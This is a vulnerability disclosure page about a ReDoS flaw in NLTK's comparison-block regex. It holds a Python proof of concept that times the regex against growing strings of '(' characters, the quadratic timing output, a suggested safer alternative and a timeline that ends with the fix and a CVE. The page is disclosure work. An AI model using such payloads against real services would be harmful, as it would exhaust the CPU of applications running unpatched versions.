Inefficient Regular Expression Complexity in nltk/nltk


Reported on

Sep 19th 2021

✍️ Description

The nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply input to the _read_comparison_block() function in the file "nltk/corpus/reader/" may cause an application to consume an excessive amount of CPU time. The vulnerable regex is the one reproduced in the proof of concept below.
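To make the description concrete, here is a minimal sketch of what the pattern from this report's proof of concept appears to extract (the last parenthesized group at the end of a line) and why the negative lookahead is costly: at every "(" it rescans the rest of the line. `ALTERNATIVE` and `last_paren_group` are hypothetical illustrations, not NLTK's API and not necessarily what the maintainers shipped. They assume single-line input with no trailing newline.

```python
import re

# Pattern copied from the proof of concept in this report.
VULNERABLE = re.compile(r"\((?!.*\()(.*)\)$")

# Assumed alternative (not taken from the NLTK source): exclude "(" from the
# captured text instead of using a lookahead that rescans the rest of the line.
ALTERNATIVE = re.compile(r"\(([^(]*)\)$")


def last_paren_group(line):
    """Hypothetical regex-free helper: text of a final "(...)" group, or None."""
    if not line.endswith(")"):
        return None
    start = line.rfind("(")  # single right-to-left scan, linear in len(line)
    if start == -1:
        return None
    return line[start + 1:-1]


samples = ["1_camera 2_phone (better)", "no parentheses", "(a) then (b)", "(open"]
for s in samples:
    # Print the three results side by side for comparison.
    print(repr(s), VULNERABLE.findall(s), ALTERNATIVE.findall(s), last_paren_group(s))
```

On these samples the three approaches agree. Only the first pattern has to re-read the tail of the string for every opening parenthesis it meets.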

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

Put the code below in a file and run it with Python:

import re
import time

# Regex copied from the vulnerable code
evil_regex = re.compile(r"\((?!.*\()(.*)\)$")

for i in range(1, 50000):
    start_time = time.perf_counter()
    # Payload grows by 40,000 "(" characters per iteration and never closes
    payload = "( " + "(" * (i * 40000)
    re.findall(evil_regex, payload)
    # perf_counter() returns seconds, so the elapsed time is in seconds
    elapsed = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(elapsed) + " s")

Check the Output:

Payload.length: 40002: 0.2007029 s
Payload.length: 80002: 0.8401304 s
Payload.length: 120002: 1.8615463 s
Payload.length: 160002: 3.2876105 s
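
The measurements above grow roughly with the square of the payload length: doubling the input roughly quadruples the time. A quick check, using only the four values printed above (no new measurements are assumed):

```python
# (payload length, reported time) pairs copied from the output above.
measurements = [
    (40002, 0.2007029),
    (80002, 0.8401304),
    (120002, 1.8615463),
    (160002, 3.2876105),
]

base_len, base_time = measurements[0]
rows = []
for length, elapsed in measurements[1:]:
    size_ratio = length / base_len    # how much longer the payload is
    time_ratio = elapsed / base_time  # how much longer the match took
    rows.append((size_ratio, time_ratio, size_ratio ** 2))
    print(f"size x{size_ratio:.2f}  time x{time_ratio:.2f}  size^2 = {size_ratio ** 2:.2f}")
```

Each time ratio lands within a few percent of the squared size ratio, which is consistent with quadratic behavior rather than exponential blow-up.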
We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the nltk team and are waiting to hear back 2 years ago
nltk/nltk maintainer validated this vulnerability 2 years ago
srikanthprathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
nltk/nltk maintainer
2 years ago


A patch has been developed and is awaiting approval from the rest of the team. Thank you for disclosing this issue to us.

nltk/nltk maintainer marked this as fixed with commit 277711 2 years ago
The fix bounty has been dropped
Jamie Slome
2 years ago

CVE published! 🎊
